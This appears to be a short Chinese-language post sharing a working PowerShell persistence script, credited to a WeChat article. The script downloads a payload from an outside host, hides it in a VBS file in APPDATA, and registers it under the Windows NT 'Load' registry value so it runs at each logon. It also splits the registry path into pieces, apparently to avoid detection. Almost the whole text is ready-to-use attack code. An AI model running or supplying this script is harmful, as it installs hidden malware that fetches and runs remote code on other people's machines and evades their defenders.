分享一个维权手法

#>
#使用Unicorn生成已编码的powershell命令。修改注册表,当用户登录时执行payload
function Add-Persistence()
{
#payload的路径
$payloadurl = "http://192.168.125.106:8000/ghu98hjbs7jhj2"
  
#保存维权马的路径
$tmpdir = $env:APPDATA;
  
#vbs路径
$payloadvbsloaderpath = "$tmpdir\_log.vbs"
  
#下载payload
$payload = (New-Object Net.WebClient).DownloadString($payloadurl)
  
$vbs = "Set oShell = CreateObject( ""WScript.Shell"" )`r`n"
$vbs += "ps = ""$payload""`r`n"
$vbs += "oShell.run(ps),0,true"
$vbs | Out-File $payloadvbsloaderpath -Force
  
#隐藏文件
$fileObj = get-item $payloadvbsloaderpath -Force
$fileObj.Attributes = "Hidden"
  
#新建注册表
$HKCU1 = "HKCU:\"
$HKCU2 = "Software\Microsoft"
$HKCU3 = "\Windows NT\Current"
$HKCU4 = "Version\Windows"
$HKCU = $HKCU1 + $HKCU2 + $HKCU3 + $HKCU4
#操作注册表的值
Set-ItemProperty -Path $HKCU -Name LOAD -Value $payloadvbsloaderpath
  
}
Add-Persistence

来源 https://mp.weixin.qq.com/s/t98nGFycEqSytvqQTK2lNw